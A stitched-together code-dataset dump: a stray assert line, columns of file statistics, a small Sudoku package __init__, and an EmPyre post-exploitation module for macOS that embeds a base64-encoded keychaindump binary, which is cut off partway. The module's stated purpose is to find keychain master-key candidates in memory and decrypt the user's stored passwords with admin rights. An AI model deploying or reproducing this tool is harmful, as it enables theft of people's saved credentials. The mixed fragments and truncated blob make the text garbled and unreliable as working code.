assert r["records"][:7] == u"aaac,0."
| 37.490361
| 95
| 0.527933
| 8,238
| 75,843
| 4.684996
| 0.054382
| 0.058039
| 0.045343
| 0.051872
| 0.881487
| 0.868662
| 0.850784
| 0.839876
| 0.829952
| 0.812359
| 0
| 0.0248
| 0.320544
| 75,843
| 2,022
| 96
| 37.508902
| 0.724152
| 0.014069
| 0
| 0.668101
| 0
| 0
| 0.234
| 0.027498
| 0
| 0
| 0
| 0
| 0.084454
| 1
| 0.039268
| false
| 0.001076
| 0.006455
| 0
| 0.051103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a605abae7e4ee590087c3d9facd08045b5b0e46
| 97
|
py
|
Python
|
Game/__init__.py
|
anchitmulye/Sudoku-pygame
|
55aaf692dd4063a015b67d0b53a2284c78451987
|
[
"MIT"
] | 3
|
2018-07-18T05:18:20.000Z
|
2020-11-03T19:44:39.000Z
|
Game/__init__.py
|
anchitmulye/Sudoku-pygame
|
55aaf692dd4063a015b67d0b53a2284c78451987
|
[
"MIT"
] | null | null | null |
Game/__init__.py
|
anchitmulye/Sudoku-pygame
|
55aaf692dd4063a015b67d0b53a2284c78451987
|
[
"MIT"
] | 4
|
2019-06-11T05:48:48.000Z
|
2022-01-26T14:08:37.000Z
|
from Game.HighScore import Highscore
from Game.Level import Level
from Game.Sudoku import Sudoku
| 24.25
| 36
| 0.845361
| 15
| 97
| 5.466667
| 0.4
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123711
| 97
| 3
| 37
| 32.333333
| 0.964706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6a84e44403cec177c412cb74a3725e6712a3f59e
| 29,097
|
py
|
Python
|
lib/modules/collection/osx/keychaindump.py
|
mibboy/EmPyre
|
63548b18e3c242bf44bc40e4156e8153ca20eb91
|
[
"BSD-3-Clause"
] | 527
|
2017-02-02T13:59:45.000Z
|
2022-03-19T03:22:05.000Z
|
lib/modules/collection/osx/keychaindump.py
|
mibboy/EmPyre
|
63548b18e3c242bf44bc40e4156e8153ca20eb91
|
[
"BSD-3-Clause"
] | 9
|
2017-02-02T14:06:04.000Z
|
2017-12-28T08:21:10.000Z
|
lib/modules/collection/osx/keychaindump.py
|
mibboy/EmPyre
|
63548b18e3c242bf44bc40e4156e8153ca20eb91
|
[
"BSD-3-Clause"
] | 164
|
2017-02-02T14:05:35.000Z
|
2022-03-22T16:47:58.000Z
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Webcam',
# list of one or more authors for the module
'Author': ['Juuso Salonen'],
# more verbose multi-line description of the module
'Description': ("Searches for keychain candidates and attempts to decrypt the user's keychain."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# list of any references/other comments
'Comments': [
"https://github.com/juuso/keychaindump"
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'TempDir' : {
'Description' : 'Temporary directory to drop the keychaindump binary.',
'Required' : True,
'Value' : '/tmp/'
},
'KeyChain' : {
'Description' : 'Manual location of keychain to decrypt, otherwise default.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
keyChain = self.options['KeyChain']['Value']
tempDir = self.options['TempDir']['Value']
if not tempDir.endswith("/"):
tempDir += "/"
script = """
import base64
import os
keychaindump = "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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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SIt0CghIiXXYSItMChBIiU3g6C38///pAAAAAOkAAAAAi0WYBQQAAACJRZjpT////+kbAAAASI09qBcAAIt1nEiLVcCwAOilFQAAiYV8////SIt9qOhgFQAASIs9oxoAAEiLP0g7ffgPhQkAAABIgcSQAAAAXcPoGhUAAA8fhAAAAAAAVUiJ5UiB7MACAABIjZVo/f//SIsFbxoAAEiLDWAaAABIiwlIiU34ib1s/f//iziLtWz9///oVhUAAL6AAAAAifEx0kyNBUAXAABIjb1w////RIuNbP3//0iJzomFTP3//7AA6J4UAABIjTUkFwAASI29cP///4mFSP3//+jlFAAASImFYP3//74AAgAASI29cP3//0iLlWD9///ohBQAAEg9AAAAAA+EdAAAAEiNNeIWAABIjZVY/f//SI2NUP3//0iNvXD9//+wAOipFAAAPQIAAAAPhUEAAABIjT3IFgAAi7Vs/f//SIuVWP3//0iLjVD9//+wAOhwFAAAi71o/f//SIu1WP3//0iLlVD9//+JhUT9///oJf3//+lo////SIu9YP3//+g0FAAASIs9TRkAAEiLP0g7ffiJhUD9//8PhQkAAABIgcTAAgAAXcPovhMAAGZmZi4PH4QAAAAAAFVIieVIg+wQSIl9+EiLffiLP+gJAAAASIPEEF3DDx8AVUiJ5Yl9/It9/A/Pifhdw1VIieVIg+xASIl98EiBPdEZAAAAAAAAD4U4AAAASMdF6AAAAwBIi33o6JYTAAAx9kjHwf////9IiQWqGQAASIsFoxkA
AEiLVehIicfoHxMAAEiJRdDHReQAAAAAi0XkOwWLGQAAD41gAAAASIt98EhjReRIacBgAAAASAMFZxkAALkUAAAAicpIicboOhMAAD0AAAAAD4UbAAAASGNF5EhpwGAAAABIAwU7GQAASIlF+OmVAAAA6QAAAACLReQFAQAAAIlF5OmR////gT0bGQAAAAgAAA+NVQAAALgUAAAAicJIx8H/////iwUBGQAAicaBxgEAAACJNfMYAABIY/hIaf9gAAAASAM92hgAAEiJfdhIi33YSIt18OhLEgAASItN2EiJTfhIiUXI6RsAAABIjT0TFQAAsADonhIAAL8BAAAAiUXE6D0SAABIi0X4SIPEQF3DZmYuDx+EAAAAAABVSInlSIl98EiJdehIi3XoSIHuAQAAAEiLffCKBDeIRecPvk3ngfkBAAAAD4wPAAAAD75F5z0IAAAAD44NAAAASMdF+AAAAADpZgAAAMdF4AEAAACLReAPvk3nOcgPjUcAAABIi0XoSC0BAAAASGNN4EgpyEiLTfAPvhQBD7515znyD4QNAAAASMdF+AAAAADpHgAAAOkAAAAAi0XgBQEAAACJReDpqv///0gPvkXnSIlF+EiLRfhdww8fgAAAAABVSInlSIHsMAIAAEiNhTD///9MjU3wTIsVsxYAAE2LEkyJVfhIiX3QSIl1yEiJVcBIiU24TIlFsEiLTbBIiwlIiU3YSItNuEiLCUiJTfBIi024SItJCEiJTehIi024SItJEEiJTeBMic9Iicbo0xAAAEiNtbD+//9IjU3oSInPiYUU/v//6LoQAABIjbUw/v//SI1N4EiJz4mFEP7//+ihEAAASIt9yImFDP7//+jyEAAASI2NMP///0yNhbD+//9MjY0w/v//SI1V2EUx20iJhSj+//9Ii33QSIu1KP7//0iLRchIiZUA/v//SInCSIuFAP7//0iJBCTHRCQIAAAAAESJnfz9///oMRAAAEjHhSD+//8AAAAASIu9KP7//0iLdcjoGP7//0iJhRj+//9Igb0Y/v//AAAAAA+GNwAAAEjHwf////9Ii0XISCuFGP7//0iJhSD+//9Ii33ASIu1KP7//0iLlSD+///o2g8AAEiJhfD9//9Ii70o/v//6AMQAABIiz1GFQAASIuFIP7//0iLP0g7ffhIiYXo/f//D4UQAAAASIuF6P3//0iBxDACAABdw+ioDwAAZg8fRAAAVUiJ5UiB7LAAAABIiwX+FAAASIsASIlF+EiJfbBIiXWoSIlVoEiJTZhEiwVlEgAARIlFk0SKDV4SAABEiE2XSItFmEgtBAAAAEGJwESJRYyBfYwAAAAAD4xDAAAAuAQAAACJwkiNfZNIi02gSGN1jEgB8UiJzuiZDwAAPQAAAAAPhQUAAADpFQAAAOkAAAAAi0WMLQQAAACJRYzpsP///4F9jAAAAAAPhR4AAABIjT3mEQAAsADoQQ8AAL8BAAAAiYVs////6N0OAABIi0WgSGNNjEgByEiJRYBIi0WASItAQEiJRfBIi0WASAUIAAAASInH6Pj6//+6MAAAAInWTI1F8EiNVcCJhXz///9Ii02ASGO9fP///0gB+UiLfahIib1g////SInPSIuNYP///+gL/f//SImFcP///0iBvXD///8AAAAAD4UMAAAAx0W8AAAAAOkpAAAAuBgAAACJwkjHwf////9IjXXASIt9sOgWDgAAx0W8GAAAAEiJhVj///9IiwWHEwAAi028SIsASDtF+ImNVP///w+FDwAAAIuFVP///0iBxLAAAABdw+jvDQAAZmZmZi4PH4QAAAAAAFVIieVIgezgAAAASIsFPhMAAEiLAEiJRfhIib1o////SIm1YP///0iLhWD///9IBQgAAABIicfo9Pn//4mFXP///0iLtWD///9IgcYMAAAASIn36Nj5//9IjTWWEAAAuQQAAACJykiNfdCJhVj///9Mi4Vg////TYtAEEyJRfBM
i4Vg////TGONWP///0+LVAgITIlV0E+LVAgQTIlV2EOLRAgYiUXg6KgNAAA9AAAAAA+EBQAAAOlYAQAAi4VY////K4Vc////iYVU////gb1U////MAAAAA+EBQAAAOkxAQAAuDAAAACJxkyNRZdIjVWgSIsNARAAAEiJTZdAij3+DwAAQIh9n0iLjWD///9MY41c////TAHJTIuNaP///0iJz0yJyehV+///SImFSP///8eFRP///wAAAACBvUT///8gAAAAD402AAAAuB8AAABIY41E////ilQNoCuFRP///0hjyIiUDXD///+LhUT///8FAQAAAImFRP///+m6////uCAAAACJxkyNRfBIjVWgSI29cP///0iLjWj////o3Pr//0iJhUj///9Igb1I////HAAAAA+EBQAAAOlTAAAASI190OiW+P//uRgAAACJykjHwf////9IjX2gSImFOP///0iLhTj///9IBRwAAABIgccEAAAASIm9MP///0iJx0iLtTD////ovQsAAEiJhSj///9IiwU1EQAASIsASDtF+A+FCQAAAEiBxOAAAABdw+isCwAAZi4PH4QAAAAAAFVIieVIgezQAAAASIsF/hAAAEiLAEiJRfhIiX3QSIt90OjK9///iUXMSIt90EiBxxAAAADot/f//4lFyItFzItNyIHBGAAAADnID4UFAAAA6QYDAABIi0XQSAUYAAAASInH6In3//+5BAAAACX+////iUXEi0XEK0XIiUXAi0XALRgAAACZ9/mJRbyBfbwUAAAAD4QFAAAA6b4CAABIi0XQSGNNwEgByEiJRbCLVciB6hQAAACB6ggAAABIY8JIiUWoSIF9qAgAAAAPgwUAAADphgIAAEiLRahIJQcAAABIPQAAAAAPhAUAAADpawIAAEiLfajo6woAAEjHwf////9IiUWgSItFsEiLOEiJfeBIi3gISIl96ItQEIlV8EiLRbBIi0AUSIlF2EiLfaBIi0WwSAUcAAAASItVqEiJxuhHCgAASI194EiJhWD////ozfb//0G4CAAAAESJwkjHwf////9IjXXYSIlFmEiLRZhIBRQAAABIicfoDQoAAEiLTaBIi1WYSIlKQEiLTahIi1WYSIlKOEiLTdBIgcEYAAAASIHBPAAAAEiJz0iJhVj////oOvb//yX+////iUWUSItN0EiBwRgAAABIgcE0AAAASInP6Bj2//8l/v///4lFkEiLTdBIY1WUSAHRSIlNiEiLTdBIY1WQSAHRSIlNgEiLfYjo6fX//4mFfP///0iLfYDo2vX//4mFeP///4G9fP///wAAAAAPhBAAAACBvXj///8AAAAAD4UFAAAA6RoBAACLhXz///8FAQAAAEhj+OiQCQAASImFcP///4uNeP///4HBAQAAAEhj+eh1CQAAMfZIx8H/////SImFaP///0iLvXD///+LlXz///+BwgEAAABIY9Lo9ggAADH2SMfB/////0iLvWj///9Ei4V4////QYHAAQAAAElj0EiJhVD////oyQgAAEjHwf////9Ii71w////SItViEiBwgQAAABMY418////SInWTInKSImFSP///+iRCAAASMfB/////0iLvWj///9Ii1WASIHCBAAAAEhjtXj///9IibVA////SInWSIuVQP///0iJhTj////oVAgAAEiLjXD///9Ii1WYSIlKSEiLjWj///9Ii1WYSIlKUEiJhTD///9IiwWuDQAASIsASDtF+A+FCQAAAEiBxNAAAABdw+glCAAADx8AVUiJ5UiD7HBIjQU0CwAAuQQAAACJykiJffhIiXXwSIt98EiJxuhqCAAAPQAAAAAPhBYAAABIjT0MCwAAsADoOQgAAIlFmOm1AQAASItF8EgFDAAAAEiJx+gT9P//iUXkSIt98EhjTeRIAc9IiX3YSItN2EiBwQQAAABIic/o7vP//4lF1MdF7AAAAACLRew7RdQPjWgBAABIi0XY
SAUIAAAAi03sweECSGPRSAHQSInH6Lrz//+JRdBIi1XYSGN90EgB+kiJVchIi1XISIHCCAAAAEiJ1+iV8///iUXEx0XoAAAAAItF6DtFxA+N+gAAAEiLRchIBRwAAACLTejB4QJIY9FIAdBIicfoYfP//4lFwEiLVchIY33ASAH6SIlVuEiLfbjoRvP//4lFtEiLVbhIgcIQAAAASInX6DDz//+JRbDHRawYAAAAi0W0i02wgcEYAAAAOcgPjiMAAABIi0W4SAUYAAAASInH6ADz//8l/v///4lFqItFqCtFsIlFrEiLRbhIY02sSAHISIlFoEiLfaDo1/L//4lFnIF9nBEH3voPhRIAAABIi334SIt1oOiK+P//6RsAAACBfZxwZ3NzD4UJAAAASIt9uOiv+v//6QAAAADpAAAAAItF6AUBAAAAiUXo6fr+///pAAAAAItF7AUBAAAAiUXs6Yz+//9Ig8RwXcNmLg8fhAAAAAAAVUiJ5UiD7DBIgT1lDAAAAAAAAA+FBQAAAOkCAQAAx0X8AAAAAItF/DsFUgwAAA+N7AAAAEhjRfxIacBgAAAASAMFMgwAAEiJRfBIi0XwSIF4QAAAAAAPhQUAAADprwAAAEiLRfBIi3g46OYFAABIiUXoSItF8EiLeEBIi0XwSItwOEiLVehIi0XwSAUcAAAASItN8EiBwRQAAABIiU3YSInBTItF2OgF9P//SIlF4EiBfeAAAAAAD4RKAAAASItF4EgFAQAAAEiJx+iFBQAASMfB/////0iLffBIiUdYSItF4EiLffBIi39YxgQHAEiLRfBIi3hYSIt16EiLVeDo9wQAAEiJRdBIi33o6CYFAACLRfwFAQAAAIlF/OkF////SIPEMF3DZi4PH4QAAAAAAFVIieVIg+wgSIE9NQsAAAAAAAAPhQUAAADpsgAAAMdF/AAAAACLRfw7BSILAAAPjZwAAABIY0X8SGnAYAAAAEgDBQILAABIiUXwSItF8EiBeFAAAAAAD4UXAAAASItF8EiBeEgAAAAAD4UFAAAA6U0AAABIi0XwSIt4UEiNNbIHAADoxwQAAD0AAAAAD4UFAAAA6SkAAABIjT2qBwAASItF8EiLcFBIi0XwSItQSEiLRfBIi0hYsADofwQAAIlF7ItF/AUBAAAAiUX86VX///9Ig8QgXcNmLg8fhAAAAAAAVUiJ5UiB7DADAABIiwVeCQAASIsASIlF+MeFTP3//wAAAACJvUj9//9IibVA/f//6Jvr//+JhTz9//+BvTz9//8AAAAAD4UeAAAASI09IAcAALAA6AMEAAC/AQAAAImFFP3//+ifAwAAsADozgMAAD0AAAAAD4QeAAAASI09GgcAALAA6NMDAAC/AQAAAImFEP3//+hvAwAAi708/f//6Ezu//9IjT0fBwAAizXPCQAAsADopAMAAIE9vgkAAAAAAACJhQz9//8PhQoAAAC/AQAAAOgwAwAAgb1I/f//AgAAAA+NRgAAAEiNPSMHAABIjYXw